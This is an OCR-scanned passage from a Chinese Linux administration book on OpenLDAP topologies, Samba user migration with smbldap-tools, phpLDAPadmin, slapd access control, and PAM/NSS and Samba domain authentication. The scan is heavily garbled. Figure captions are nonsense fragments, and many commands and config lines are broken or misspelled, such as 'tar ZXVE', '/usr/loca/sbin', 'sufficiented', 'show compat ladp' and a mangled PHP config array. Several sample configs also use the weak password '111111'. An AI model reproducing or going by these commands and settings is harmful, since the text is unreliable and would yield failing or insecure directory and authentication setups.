自己 的 管理 员 来 维护 各 自 的 分 支 。 三 台 服 务 器 连接 在 一 起 有 很 多 好 处 , 在 需要 搜索 或 查询 公司 
所 有 员工 信息 的 时 候 就 会 十 分 方便 如果 某 个 城市 的 员工 较 多 或 负载 过 重 还 可 以 在 这 个 城市 增 
加 LDAP 服务 器 ， 增 加 的 服务 器 就 如 同 本 地 服务 器 的 镜像 ， 可 以 起 到 负载 均衡 的 作用 。 需 要 
注意 的 是 ， 在 这 个 设计 方案 里 每 个 LDAP 服务 器 都 是 可 以 读 写 的 。 


Server1 server 
or=ldap_abz. org 一 全 uc=ldap_abc org 


0 TShan 
AND a 
“a gob 
ON. 
() I=Guangzhou, o=ldap_abc org 


uidrusrl uidusrj uid-usrk 


NE 
站 


idrusrl uidusrj 。 uid=usrg 


图 2.8 互相 连接 的 三 台 服 务 器 
另 一 种 方案 是 在 北京 存放 一 台 主 LDAP 服务 器 ， 同 时 在 北京 、 广 州 和 上 海 三 个 城市 分 别 
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放置 一 台 辅 LDAP 服务 器 。 主 LDAP 服务 器 只 负责 写 入 数据 ， 辅 LDAP 服务 器 只 读 ， 任 何 数 
据 库 的 修改 都 要 先 写 入 主 LDAP 服务 器 之 后 再 同步 到 三 个 辅 LDAP 服务 器 ， 这 样 的 拓扑 结构 
也 比较 适合 认证 服务 器 的 需要 , 因为 写 操作 相对 于 读 操作 更 少 , 这 种 设计 的 优势 在 于 能 根据 员 
工 的 多 少 或 各 分 公司 的 负载 情况 灵活 增加 或 减少 服务 器 ， 任 何 一 台 辅 LDAP 服务 器 的 瘫痪 都 
不 会 影响 到 整个 认证 系统 。 在 国外 的 一 些 案例 中 辅 LDAP 服务 器 会 多 达 几 十 甚至 上 百 台 。 但 
这 种 设计 也 有 缺陷 ,如 果 主 LDAP 出 现 问题 ,那么 所 有 的 写 操作 就 会 受到 影响 , 目前 OpenLDAP 
还 不 支持 多 个 主 LDAP 服务 器 的 情况 ， 因 为 设置 多 个 主 LDAP 服务 器 有 可 能 会 造成 整个 数据 
的 不 一 致 ， 只 有 少数 商用 的 LDAP 支持 多 主 LDAP 的 功能 。 


2.1.9 利用 Smbldap-tool 工具 管理 Samba 


LDAP 是 用 户 认证 的 一 个 通用 解决 方法 ,这 里 把 Samba 账 户 与 之 相 结合 ,也 就 是 利用 LDAP 
实现 用 户 的 集中 管理 。 在 Samba 服务 器 安装 之 前 ,需要 修改 服务 器 的 PAM 认证 ， 系 统 用 户 通 
过 LDAP 认证 后 ， 在 系统 中 就 可 以 通过 LDAP 认证 登录 了 ， 接 下 来 进行 Samba 用 户 和 组 的 导 
入 工作 。 选 用 的 是 smbldap-tools 工具 导入 用 户 和 组 。 

在 该 网 站 下 载 最 新 版 本 的 Smbldap-tools 软件 包 smbldap-tools-0.9.5.tgz: 


#tar ZXVE smbldap* 

#cd smbldap* 

#mkdir/etc/smbldap-tools 

#cp smbldap-* /usr/local/sbin 

# 这 里 的 路 径 要 和 smb .conf 中 的 一 致 

#cp smbldap bind.conf /etc/smbldap-tools 
#cp smbldap.conf /etc/smbldap-tools 

#cp smbladp tools.pm /usr/local/sbin 
#chmod 755 /usr/loca/sbin/* 

#chmod 644 /usr/loca/sbin/smbldap tools.pm 
#chmod 644 /etc/smbldap-tools/smbldap.conf 
#chmod 600 /etc/smbldap-tools/smbldap bin.conf 


两 个 conf 文件 是 结合 Samba 和 LDAP 的 配置 文件 ,根据 前 面 的 配置 对 这 两 个 文件 进行 修 
改 或 添加 ， 正 确 配置 后 才能 使 LDAP 和 Samba 协调 工作 。 

将 刚才 用 net 命令 获取 的 域 SID 值 复 制 到 smbldap.conf 配置 文件 中 ， 编 辑 配置 文件 
/etc/smbldap-tools/smbldap.conf 后 ， 再 修改 /etc/smbldap-tools/smbldap_bind.conf 文件 , 该 文件 是 
在 连接 LDAP 服务 器 时 用 到 的 配置 文件 ， 仅 限 Root 用 户 使 用 ， 注 意 密 码 要 和 slapd conf 中 的 
一 样 。 

接 下 来 运行 smbldap_populate 命令 , 该 命令 主要 用 来 初始 化 LDAP 目录 的 信息 , 它 将 创建 
一 个 域 管理 员 、 一 些 必 要 的 组 和 其 他 重要 的 模式 元 素 ， 有 点 像 创建 数据 库 时 的 数据 字典 。 
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注意 : smbldap populate 可 能 会 提示 输入 域 管 理 员 的 密码 ， 域 管理 员 在 默认 情况 下 称 为 
root， 给 这 个 用 户 设 置 的 密码 应 该 不 同 于 slapd.conf 中 使 用 的 Rootdn 密码 ， 也 不 同 于 Linux 机 
器 的 root 用 户 密码 。 

在 用 smbldap-tool 之 前 先 要 配置 一 下 ， 下 面 先 讲解 配置 文件 的 含义 以 及 关键 的 配置 环 


# ls /etc/smbldap-tools/ 

smbldap bind.conf smbldap.conf 

#vi smbldap bind.conf 
slaveDN="cn=root,dc=site,dc=com" 
slavePw="111111™ 
masterDN="cn=root,dc=site,dc=com" 
masterPw="111111" 

# 这 部 分 要 与 前 面 你 配置 的 LDAP 服务 器 的 管理 员 相 同 
verify="require" 
cafile="/etc/smbldap-tools/ca.pem" 
clientcert="/etc/smbldap-tools/smbldap-tools .pem" 
clientkey="/etc/smbldap-tools/smbldap-tools.key" 
# 以 上 为 安装 后 默认 设置 没 改动 过 
suffix="dc=site,dc=com" 

# 前 面 配 置 LDAP 时 说 过 ， 不 再 解释 了 
usersdn="ou=Users, ${suffix}" 

# 用 户 的 检索 字段 
#computersdn="ou=Computers, ${suffix}" 

# 去 掉 此 项 

groupsdn="ou=Groups, ${suffix}" 

# 用 户 组 的 检索 字段 

hash_ encrypt="SSHA" 

#Password 的 加 密 方式 

# 以 下 为 建立 UNIX 用 户 时 的 参数 
userLoginshell="/bin/false" 

# 不 需要 用 户 登 录 服 务 器 

userHome="/home/%U" 

# 用 户 的 home 目录 ，Samba 的 homes 用 这 个 

# Default mode used for user homeDirectory 
userHomeDirectoryMode="700" 

#HOME 目录 的 权限 

# Gecos 


userGecos="System User™" 


然后 是 smbldap.conf 配置 文件 ， 这 个 文件 在 建立 用 户 时 比较 重要 : 


每 台 服务 器 特有 的 ID 号 可 用 下 面 的 命令 生成 ， 这 个 一 定 要 修改 ， 不 然 Samba 通过 LDAP 
建立 的 用 户 会 有 问题 : 


smbldap-tools 还 自 带 了 configure.pl 脚本 配置 工具 ， 用 来 创建 smbldap.conf 配置 文件 ， 不 
过 还 是 自己 修改 配置 文件 比较 保险 。 
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2.1.10 利用 Smbldap-tool 初始 化 LDAP 
1. 运行 以 下 命令 
#smbldap-populate 
Populating LDAP directory for domain site (你 自己 服务 器 的 SID 号 ， 这 个 一 定 要 修改 ) 
(using builtin directory structure) 
adding new entry: dc=site,dc=net 
adding new entry: ou=Users,dc=site,dc=net 
adding new entry: ou=Groups,dc=site,dc=net 
adding new entry: ou=Computers,dc=site,dc=net 
adding new entry: ou=ldmap,dc=site,dc=net 
adding new entry: uid=root,ou=Users,dc=site,dc=net 
adding new entry: uid=nobody,ou=Users,dc=site,dc=net 
adding new entry: cn=Domain Admins,ou=Groups,dc=site,dc=net 
adding new entry: cn=Domain Users,ou=Groups,dc=site,dc=net 
adding new entry: cn=Domain Guests,ou=Groups,dc=site,dc=net 
adding new entry: cn=Domain Computers,ou=Groups,dc=site,dc=net 
adding new entry: cn=Administrators,ou=Groups,dc=site,dc=net 
adding new entry: cn=Account Operators,ou=Groups,dc=site,dc=net 
adding new entry: cn=Print Operators,ou=Groups,dc=site,dc=net 
adding new entry: cn=Backup Operators,ou=Groups,dc=site,dc=net 
adding new entry: cn=Replicators,ou=Groups,dc=site,dc=net 
adding new entry: sambaDomainName=site,dc=site,dc=net 
Please provide a password for the domain root: 
Changing password for root 
New password : 111111 (root 的 1dap 管理 密码 ) 
Retype new password : 111111 (root 的 1dap 管理 密码 ) 


2. 将 Samba 用 户 和 组 信息 导入 到 LDAP 


先 拿 到 原来 Samba 服务 器 上 的 passwd 和 group 文件 ，passwd 文件 删除 系统 账号 只 留 下 
Samba 账号 : 


#awk -F: '{print $1,$3,$4}' passwd > userlist 
这 样 导 出 来 的 数据 结构 是 : 用户 名 UID GIDgroup 文件 删除 系统 账号 只 留 下 Samba 组 : 


#awk -F: '{print $1,$3,$4}' group > grouplist 


这 样 导出 来 的 数据 结构 是 : 组 名 GID 用 户 列表 ， 有 了 这 两 个 文件 后 ， 编 写 一 个 很 简单 的 
脚本 文件 ， 通 过 smbldap-useradd 添加 用 户 : 
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#more useradd.sh 
!/bin/bash 
while read name uid gid 
do 
/usr/sbin/smbldap-useradd -a -u $uid -g $gid -m $name 


done < userlist 


3. 建立 组 用 户 


#more groupadd.sh 
!/bin/bash 
while read name gid member 
do 
/usr/sbin/smbldap-groupadd -a -g $gid $name 


done < grouplist 
再 来 就 是 把 用 户 加 入 到 指定 组 中 : 


smbldap-groupmod 
#more groupmember.sh 
!/bin/bash 
while read name gid member 
do 
/usr/sbin/smbldap-groupmod -m "$member" $name 


done < grouplist 


到 上 面 为 止 用 户 和 组 都 已 经 导入 , 而 且 设 定好 了 用 户 的 属 组 。 用 smbldap-tool 来 管理 账号 : 


# smbldap-useradd -a -m test (添加 一 个 samba 账号 并 创建 主 目录 ) 
# smbldap-groupadd -a -m site (添加 一 个 samba 组 账号 ) 


这 里 添加 用 户 组 的 时 候 一 定 加 -a 参数 ， 这 个 不 会 在 改变 用 户 属 组 后 看 不 到 共享 文件 ， 整 
个 导入 过 程 需要 等 待 一 段 时 间 , 例如 果 1000 名 用 户 不 到 10 分 钟 就 能 完成 导入 , 如 果 用 户 更 多 
则 可 能 花费 更 长 时 间 。 到 这 里 Samba 用 户 全 都 迁移 到 LDAP 认证 了 ， 以 后 新 建 、 删 除 用 户 都 
可 以 用 smbldap-tool 来 完成 。 需要 补充 一 点 : 除了 可 以 利用 上 面 介绍 的 LDAP Account Manager 
工具 进行 管理 外 ，ldapbrowser、Webmin、ldapadministrator( 目 前 Windows 平台 的 收费 程序 ) 
都 是 不 错 的 管理 工具 ， 有 兴趣 的 读者 可 以 自行 尝试 。 


2.1.11 使 用 phpLDAPadmin 管理 LDAP 服务 器 


在 Linux 服务 器 端 提供 了 LDAP 浏览 器 ， 如 图 2.9 所 示 。 有 时 候 希 望 通过 Web 方式 进行 
管理 更 为 方便 ， 这 里 为 大 家 介绍 Web 方式 的 phpLDAPadmin， 它 是 免费 开源 的 工具 ， 可 以 管 
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r= 


E OpenLDAP 服务 器 ， 它 有 LDAP Browser 客户 端 工具 的 所 有 功能 。 


注意 : phpLDAPadmin 运行 前 提 是 要 安装 配置 Apache， 并 支持 PHP 。 


加 | 
图 LDAP 浏览 器 


LDAP 连接 
当前 LDAP 客户 规 设 置 | 水 加 内 | | 到了 红 


吞 理 只 


LDAP 酚 务 器 密码 人 L) 


区 各 访 同 (3) | 不 消 (Q 


图 2.9 LDAP 浏览 器 

phpLDAP 官方 的 下 载 主页 是 http://phpldapadmin.sourceforge.net/wiki/index.php/Download，, 
下 载 安装 步骤 如 下 : 

#tar vxf phpldapadmin-1.0.tar 

解压 后 将 其 复制 到 网 站 根 目录 下 ， 例 如 /var/www/， 当 然 根 据 Apache 的 配置 文件 而 定 : 

#cd phpldapadmin-1.0/config 

#cp config.php.example config.php 

修改 config.php 配置 文件 : 

#vi config.php 

$server[$i][ ‘host*]= site.localhost; 


S$server[S$Si]l[` base `]=`dc=sitev dc=com 7 


$server[$i][` login pass ]=`secretll1111 7 


这 里 的 6 个 1 为 服务 器 root 管理 员 密 码 。 接 下 来 在 浏览 器 地 址 栏 里 输入 
http://IP/phpldapadmin， 界 面 如 图 2.10 和 图 2.11 所 示 。 
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图 2.10 phpLDAP 界面 
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的 安全 管理 


本 章 主要 讨论 了 LDAP 集成 账号 的 管理 ， 涉 及 到 各 种 信息 的 共享 和 访问 ， 它 的 安全 性 自 


然 成 为 一 个 十 分 奸 


要 的 问题 ,必须 防止 信息 遭受 未 授权 访问 或 算 改 等 攻击 , LDAP 的 安全 形势 


越 来 越 严峻 。 目 前 网 络 上 对 LDAP 安全 性 的 系统 、 全 面 、 深 入 地 分 析 几 乎 没有 ， 多 数 文献 只 
涉及 到 LDAP 安全 性 的 一 部 分 内 容 ， 针 对 数据 安全 和 访问 控制 的 安全 性 分 析 更 是 匮乏 。 
LDAP 目录 中 存储 了 大 量 的 各 种 类 型 的 数据 : 有 些 可 以 公开 访问 《匿名 ) ， 有 些 却 十 分 敏 
感 。 虽 然 身份 认证 、 机 密 性 和 完整 性 都 有 效 阻止 了 非法 用 户 LDAP 目录 服务 的 攻击 ， 但 通过 
身份 认证 的 合法 用 户 ， 并 不 具有 任意 访问 和 操作 LDAP 目录 服务 器 上 的 资源 的 权限 。 必 须 使 
用 一 种 有 效 的 手段 来 防止 用 户 进行 非法 访问 或 算 改 等 越权 操作 。 作 为 LDAP 安全 体系 的 重要 
组 成 部 分 之 一 ， 授 权 的 作用 就 是 确认 用 户 提出 的 操作 请 求 如 读 取 、 写 入 、 创 建 及 删除 条 目 等 ， 


是 真正 被 允许 的 ， 
修改 slapd.co! 


通常 授权 由 访问 控制 机 制 来 实现 。 下 面 将 讲解 如 何 使 用 ACL 实现 用 户 认证 。 
nf 配置 文件 : 
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#vi /etc/openldap/slapd.conf 
access to attr=userPassword 
by anonymous auth 
by self write 只 能 由 自己 修改 ， 有 效 验 证 用 户 查 询 
by * none 
access to * 
by self write 
by users read # 人 允许 授权 用 户 查询 的 信息 


访问 控制 是 要 禁止 匿名 查询 的 (在 /etc/openldap/slapd.conf 中 加 入 一 行 disallow bind_anon)。 

另外 大 家 在 设置 /etc/openldap/slapd.conf 文件 密码 时 不 要 为 了 方便 而 使 用 明文 ， 这 样 做 是 
非常 危险 的 事 ， 最 新 的 OpenLDAP 已 支持 三 种 加 密 方法 分 别 是 : MD5、SSHA 以 及 CRYPT。 
这 里 通过 默认 的 SSHA 方法 ， 用 slappasswd 命令 来 完成 : 


#slappasswd 

New password: 

Re-enter new password: 
{SSHA}VAOLVstzxTh2uF1glL+6Saoeq2sXSmEf 


然后 复制 这 个 新 的 散 列 到 slapd.conf 内 : 
rootpw {SSHA}VAOLVstzxTh2uFlglL+6Saoeq2sXSmEf 


在 保存 退出 后 记得 要 重新 启动 服务 。 

前 面 提 到 的 认证 方式 还 存在 一 些 不 足 ， 例 如 用 户 在 使 用 FTP 服务 后 ， 如 果 再 使 用 Samba 
服务 就 需要 再 次 输入 用 户 名 和 密码 ， 目 前 微软 的 Active Directory 通过 管理 域 用 户 已 经 完美 地 
实现 了 单 点 登录 ，Linux 可 以 通过 OpenLDAP 和 Samba 实现 大 部 分 Active Directory 能 够 实现 
的 功能 。 相 信 在 不 久 的 将 来 ,用 LDAP 做 身份 认证 的 技术 还 会 渗透 到 更 多 领域 ， 包 括 网 络 计 
算 机 、 门 禁 系 统 ， 甚 至 智能 IC 卡 的 应 用 。 


2.2 利用 LDAP 实现 Windows 和 Linux 平台 统一 认证 


技术 是 为 应 用 服务 的 ， 没 有 应 用 ， 技 术 就 无 用 武之 地 。 同 样 ， 一 台 单独 的 LDAP 服务 器 
没有 任何 意义 ， 只 有 把 所 有 需要 认证 的 环节 纳入 到 LDAP 系统 中 ， 才 能 使 它 发 挥 应 有 的 作用 。 
首先 来 看 看 Linux 系统 认证 。 


2.2.1 Linux 认证 


对 于 Red Hat Linux, 系统 默认 提供 LDAP 认证 支持 。 对 于 Debian Linux, 则 需要 安装 libpam 
和 libnss-ldap 两 个 包 。 对 其 他 Unix， 如 Solaris， 则 需要 手工 编译 pam_ldap 和 nss_ldap。 关 于 
Solaris 的 LDAP 认证 已 超出 本 文 的 范围 ,不 再 叙述 。 前 面 提 到 过 ，Linux 通常 使 用 PAM 认证 ， 
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准确 地 说 ， 应 该 是 PAM 和 NSS (Name Service Switch) 两 套 系 统 。 对 于 支持 PAM 的 认证 ， 
流程 大 致 如 下 ， 一 个 支持 PAM 的 应 用 ， 如 SSH 或 FTP， 在 用 户 发 出 请 求 时 ， 会 到 /etc/pare.d 
下 搜索 相关 的 配置 文件 ， 如 SSH 会 搜索 /etc/pare.d/ssh， ProFTPD 会 搜索 /etc/pam.d/proftpd， 本 
地 Login 则 会 搜索 /etc/pam.d/login。 在 找到 相应 的 配置 文件 后 ， 会 根据 配置 文件 的 指示 查找 认 
证 模块 并 进行 认证 。 例 如 : 

auth sufficiented pam ldap.so 


上 面 这 句 话 告诉 应 用 系统 ， 认 证 可 以 使 用 pam_ldap.so 模块 。 再 如 : 


password reuired pam ldap.so 


则 告诉 系统 ， 验 证 密码 必须 通过 pam_ldap.so 模块 来 进行 。 

required 和 suficiented 的 区 别 在 于 ，required 告诉 系统 ， 如 果 这 一 模块 验证 失败 ， 则 整个 认 
证 过 程 失败 ， 而 sufficiented 告诉 系统 ， 如 果 该 模块 失败 ， 还 可 以 尝试 使 用 后 面 的 模块 进行 认证 。 

相应 的 模块 会 使 用 相应 的 配置 文件 进行 操作 。 例 如 pam ldap.so， 就 会 用 到 系统 的 LDAP 
配置 来 进行 LDAP 查询 操作 。 如 果 验 证 成 功 ， 就 进入 系统 ， 反 之 则 失败 。 不 同 于 PAM,， NSS 
使 用 系统 本 身 的 配置 。 当 一 个 应 用 请 求 系统 进行 验证 时 ， 系 统 根 据 /etc/nsswitch.conf 确定 使 用 
哪些 服务 进行 验证 。 如 果 包 含 LDAP， 则 和 PAM 一 样 根据 LDAP 配置 去 查询 LDAP 服务 器 。 
为 了 更 清楚 地 说 明 这 一 点 ， 可 以 参看 图 2.12 的 认证 流程 。 


(Cpam 


Nss ) 
No a 
时 
查找 /etc/pam.d/, 确定 检查 /etc/nsswitch.conf 
使 用 何 种 模块 确定 使 用 何 种 服务 
时 了 
tpap 模块 根据 tpap 服务 根据 
/etc/pam_ldap.conf 查 /etc/libnss_ldap.conf 查 
将 IDAP 服务 各 词 DAp 服务 器 


2.12 ”LDAP 认证 流程 
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很 明显 ，Linux 系统 需要 配置 /etc/nsswitch.conf、 /etc/paInjdap.conf.11、/etc/libnss_ldap.conf 
三 个 文件 来 完全 支持 LDAP 认证 。Red Hat 把 pam ldap.conf 和 fllibnss_ldap.conf 合并 为 
/etc/iclap.conf。 昌 然 这 两 个 文件 内 容 大 同 小 异 ， 但 Debian 这 种 分 开 配 置 的 方法 无 疑 能 让 使 用 
者 对 系统 更 加 了 解 。 下 面 来 看 看 具体 的 文件 配置 。 通 常 ，pam ldap.conf 和 libnss_ldap.conf 选 
项 基本 一 致 ， 包 括 如 下 几 项 : 


#LDRP 服务 器 地 址 ， 可 以 是 host IP 或 url http://hostname 

host 192.168.0.1 +# 初 始 搜索 位 置 

base ou=people,dc=company, dc=com, dc=cn 

ldap_version 3 # 可 以 指定 LDAP 版 本 

# 如 果 LDAP 服务 器 不 允许 匿名 访问 ， 还 需要 指定 可 以 访问 的 用 户 名 和 密码 
binddn somesone 


bindpw someprivateword 


以 上 就 是 一 个 基本 的 配置 文件 。 对 于 nsswitch.conf 文件 ， 在 下 面 几 个 选项 后 加 上 LDAP 
服务 : 


password:compat ldap 
group:compat ldap 
show compat ladp 


也 有 可 能 如 下 : 


password:files ldap 
group:files ldap 
shadow files ldap 


这 是 为 了 告诉 系统 在 检查 系统 用 户 信息 时 查询 LDAP 服务 。 对 于 任何 使 用 PAM 的 应 用 ， 
只 需要 在 相应 /etC/Pam.d/ 配置 文件 的 相应 位 置 加 上 如 下 内 容 就 可 以 应 用 LDAP 服务 了 。 


auth required pam ldap.so 
auth ..... 

account required pam ldap.so 
account ....  。。。。 
password required pam ldap.so 


password 


这 就 是 一 台 LDAP 认证 的 Linux 主机 所 需要 的 全 部 配置 。 当 然 , 还 有 很 多 配置 细节 ， 如 密 
码 处 理 方式 、 搜 索 用 户 名 模式 等 ， 选 择 默 认 就 可 以 ， 不 需要 进行 特别 修改 。 对 于 存放 在 LDAP 
数据 库 中 的 Unix 用 户 ， 只 需要 遵循 posixAccount 方案 就 可 以 。 通 常 包括 以 下 几 个 属性 : 


dn:uid=Tom, dc=people,dc=company, dc=com, dc=cn 
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uid:Tom 

uidNumber:10001 
gidNumber:101 
homedirectory:/home/Tom 
loginshell:/bin/bash 


一 个 Linux 用 户 在 LDAP 中 就 变 成 了 以 上 这 样 。 在 确保 LDAP 数据 库 中 包含 该 条 目 ， 并 
且 Linux 主机 正确 配置 了 LDAP 访问 后 ， 就 可 以 用 id 测试 该 用 户 是 否 已 被 系统 识别 。 


#id Tom 


如 果 显 示 No such user， 则 说 明 配置 不 正确 ， 需 要 检查 系统 认证 日 志 (Debian 是 
/var/log/auth.log) 和 LDAP 日 志 ， 看 看 发 生 了 什么 问题 。 另 外 ， 如 果 系 统 运行 着 NSCD 进程 ， 
应 该 把 它 停 掉 : 


#/etc/init.d/nscd stop 


NSCD 是 Name Service Cache Daemon 的 缩写 ， 提 供 名 字 服 务 的 缓存 。 如 果 是 第 一 次 配置 
LDAP， 可 能 会 发 生 系统 只 在 缓存 中 查找 用 户 而 不 去 LDAP 查询 的 情况 。 
通常 ， 主 机 认证 日 志 中 会 详细 记载 认证 失败 的 原因 ， 可 能 是 主机 名 配置 不 对 、 不 允许 莫名 
访问 或 错误 的 Searchbase。 根据 这 些 原 因 再 做 相应 的 修改 ， 完成 Linux 系 统 的 LDAP 认 证 应 该 没 
有 问题 。 


2.2.2 ”Windows 认证 


完成 了 Unix/Linux 的 LDAP 系统 认证 ， 再 来 看 看 Windows 认证 。Windows 认证 必须 用 到 
Samba， 从 www.samba.org 下 载 Samba 源码 包 ， 解 开 该 源码 包 ， 进 入 samba-x.x.x/Source 目录 。 
执行 安装 命令 : 


# ./configure-prefix=/usr/local/samba -with-ldap-with-ldapsam - with-pam ... 
#make 


#make install 


这 样 ，Samba 将 被 安装 到 /usr/local/samba 下 ， 其 配置 文件 默认 是 
/usrlocal/sambaylib/smb.conf。 在 安装 过 程 中 , 需要 注意 “-with-ldap ”等 选项 要 求 系统 中 有 LDAP 
头 文件 。 如 果 是 Debian， 可 以 安装 libldap2-dev 包 ， 其 他 系统 可 以 安装 相应 的 包 或 通过 指定 编 
译 目 录 ， 将 OpenLDAP 源码 目录 下 的 include 包含 进来 。 

在 保证 Samba 安装 正确 的 同时 , 还 要 保证 OpenLDAP 可 以 识别 Samba 的 schema。 需 要 将 
Samba 源码 下 exampels/ldap/ 中 的 samba. schema 文件 复制 到 LDAP 服务 器 中 的 schema 目录 下 ， 
通常 是 /etc/openldap/schema 或 /etc/ldap/schema。 在 slapd.conf 开头 添加 如 下 内 容 : 


include /etc/openldap/schema/samba.schema 


并 保证 使 用 的 samba. scheme 和 当前 的 Samba 版 本 完全 一 致 。 完 成 Samba 安装 后 ， 就 可 


以 进入 Samba 的 配置 阶段 。Samba 的 配置 相对 简单 ， 下 面 是 一 个 可 用 的 最 小 LDAP PDC 配置 
范例 : 
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comment=NET LOGON 


2.2.3 Linux+Windows 统一 认证 


首先 ,对 于 Windows NT 域 来 说 ,它们 都 有 一 个 唯一 的 Domain SID。 如 果 一 个 Windows NT 
域 删除 后 重建 ， 即 使 域名 一 样 ， 原 有 的 账户 也 不 可 以 登录 ， 这 是 因为 标记 域 的 Domain SID 改 
这 下 

在 Samba 中 ， 通 过 sambaSID 来 模拟 Domain SID， 如 果 用 户 的 sambaSlD 与 整个 Samba 
域 的 SID 不 一 致 ， 就 无 法 实现 加 入 域 、 管 理 域 等 操作 ， 严 重 时 还 可 能 导致 Windows 当 机 。 因 
此 ， 一 定 要 保证 所 有 组 和 用 户 的 sambaSID 前 级 与 整个 Samba 的 sambaSlD 一 致 。 

可 以 用 以 下 命令 来 获得 当前 的 Domain SID， 后 面 的 域名 是 可 选 的 : 


#net getlocalsid[DomainName] 


还 可 以 用 以 下 命令 来 更 改 Domain SID， 这 个 特性 在 真正 的 Windows NT 域 中 也 是 难以 实 
现 的 。 


#net setlocalsid 


假设 这 里 得 到 的 SID 是 S-I-5-21-4241124412-3422050281-1132630612， 那 么 所 有 用 户 的 
sambaSID 前 半 部 分 都 要 和 这 个 字符 一 致 。 

其 次 ，Windows NT 域 中 有 几 个 特殊 的 组 , 一 个 是 以 512 为 groupID 的 Domain Admin 组 ， 
一 个 是 以 513 为 groupID 的 Dom ain User 组 。 顾名思义 ,属于 Domain Admin 组 的 成 员 都 是 域 
管理 员 权 限 ， 属 于 Domain User 的 成 员 都 是 域 用 户 。 一 般 来 讲 ， 每 个 用 户 都 应 当 是 域 用 户 。 

对 于 Samba 来 说 ， 如 何 实现 这 种 组 的 管理 呢 ?只 要 简单 地 建立 两 个 groupID 为 512 和 513 
的 posixGroup， 并 映射 为 Windows NT Domain Group 就 可 以 了 。 


dn;cn=domain Admin,ou=human,dc=prosten,dc=com, dc=cn 
objectClass;posixGroup 

objectclass;sambaGroupMapping 

gidNumber; 512 

cn;domain Admin 

description;netbios domain Administrators 
sambaSID:S-I-5-21-4241124412-3422050281-1132630612-512 
sambagroupType:2 

displayname:domain Admins 

memberUid:root 


memberUid:administrator 
把 上 述 数据 加 入 到 LDAP 中 ， 然 后 运行 如 下 命令 : 
#net groupmap list 


可 以 看 到 Unix Group 与 Windows NT Domain Group 之 间 的 对 应 ，Domain User 也 是 一 样 。 
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然后 ， 保 证 用 户 sambaPrimaryGroupSID 的 最 后 一 段 与 groupID 对 应 就 可 以 了 。 如 用 户 信息 
sambaPrimaryGroupSID 为 S-L5-21-4241124412-3422050218-1132630612-512， 前 面 的 部 分 是 
sambaSID， 最 后 的 512 是 用 户 域 组 信息 。 

设置 好 组 ， 再 回 过 头 来 看 看 用 户 。 从 前 面 的 用 户 LDIF 文件 中 可 以 看 出 ， 通 过 gidNumber 
可 以 确定 Tom 属于 mis 组 ，uid 是 1001， 主 目录 是 /home/Tom， 登 录 所 用 的 Shell 是 /bin/bash。 
为 了 保证 能 够 顺利 地 将 Windows 主机 加 入 Samba 域 ， 还 需要 添加 uid 为 0 (vidNumber: 0) 
的 root 用 户 。 该 root 用 户 和 其 他 用 户 一 样 ， 同 时 是 Unix 用 户 和 Samba 用 户 。 

为 了 能 让 Samba 管 理 好 自己 的 账号 ,需要 将 LDAP 管 理 员 密码 告诉 Samba, 也 就 是 smb.conf 
中 ldap admin dn 这 个 用 户 的 密码 。 执 行 如 下 命令 : 


#smbpasswd -w yourpassword 


将 密码 写 入 Samba 本 地 密码 文件 中 ， 同 时 不 要 忘记 在 slapd.conf 中 加 入 Samba 的 schema 
文件 。 

在 确定 LDAP 中 已 存在 相应 的 用 户 后 ， 需 要 把 某 些 本 地 Unix 用 户 ， 如 Tom“ 添 加 ”到 
Samba 用 户 中 。 这 里 的 添加 不 是 通常 意义 的 添加 ， 因 为 这 个 本 地 用 户 Tom 也 是 存在 于 同一 个 
LDAP 条目 中 的 用 户 ，Samba 不 过 是 对 这 个 条 目 做 一 些 修改 。 运 行 以 下 命令 实现 用 户 添加 : 


#smbpasswd -a Tom 


系统 会 要 求 输入 两 遍 密 码 。 完 成 后 ， 用 ldapsearch 或 stapcat 命令 察看 当前 LDAP 数据 库 ， 
可 以 发 现 LDAP 数据 库 中 增加 了 和 smb.conf 中 workgrouP 对 应 的 sambaDomainName 条 目 , 类 
似 如 下 : 


dn:sambaDomainName=COMPANY .NET, ou=people, dc=company, dc=com, dc=cn 
sambadomainName :COMPANY .NET 
sambaSID:S-1-5-21-4241124412-3422050281-1132630612 


前 面 已 经 强调 过 ，sambaSID 非常 重要 ， 它 唯一 标记 了 整个 Windows NT 域 ， 所 有 域 中 的 
用 户 和 计算 机 都 应 当 拥有 与 其 一 致 的 SID 。 对 于 Tom 来 说 ， 则 发 生 了 更 多 的 改变 。 现 在 , Tom 
的 LDAP 条目 将 增加 以 下 内 容 : 


sambaLMPassword:80F2229B75373BEAF939D67E7A1873C 
sambaNTPassword:988524EF7497105DA8AE15C11581836D 
sambaAcctFlags: [U] 
sambaPasswordhistory:00000000000000000000000000000000 
sambaPrimaryGroupSID:S-1-5-21-4241124412-3422050281-1132630612-512 
sambaPwdCanChange:1096604336 

sambaPwdLastSet:1096604336 

sambaPwdMustChange:2147473647 
sambaSID:S-1-5-21-4241124412-3422050281-1132630612-21304 
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其 中 ，sambaLM Password 和 sambaNTPassword 是 Windows NT 域 使 用 的 密码 。 在 Unix 
上 可 以 用 Samba 自 带 的 mkntpasswd 命令 来 生成 这 两 个 密码 , 这 样 不 需要 通过 Samba 操作 , 仍 
然 可 以 生成 用 户 的 域 口 令 。 注 意 ， 这 个 工具 可 能 没有 被 安装 ， 可 以 在 Samba 源码 目录 下 的 
examples/LDAP 下 找到 ， 并 进行 手工 编译 安装 。 

sambaAcctFlags 指定 这 个 账号 的 类 型 ， 常 见 的 选项 包括 如 下 。 


@ U: User 用 户 ; 
@ W: Workstation 机 器 账号 ; 
@ X: 不 需要 密码 。 


具体 含义 可 以 参阅 Samba 官方 HOWTO 中 的 LDAP Password Database 部 分 
( http://us4.samba.org/samba/docs/man/Samba-HOWTO-Collection/passdb.html#id2533661 ) 。 

Samba-LDAP-Howto(htp:/www.unav.es/cti/ldap-smb/ldap-smb-3-howto.html) 也 是 必 读 的 。 

sambaPrimaryGroupSID 在 前 面 已 经 说 过 ， 标 志 了 用 户 的 Windows NT 域 组 。 

sambaPwdCanChange、sambaPwdLastSet 和 sambaPwdM ustChange 都 是 用 于 标记 用 户 账号 
可 用 性 的 Unix 时 间 戳 ， 一 般 不 用 改动 。 

SambaSID 的 前 半 部 分 和 Domain SID 保持 一 致 ， 后 面 是 一 个 序列 号 ， 每 个 用 户 都 不 一 样 ， 
但 并 没有 特别 的 规范 。 

一 般 来 说 ， 不 要 手工 修改 这 些 值 ， 应 当 使 用 mbpasswd 进行 修改 。 了 解 这 些 信 息 对 于 大 批 
量 修改 用 户 是 很 有 帮助 的 。 

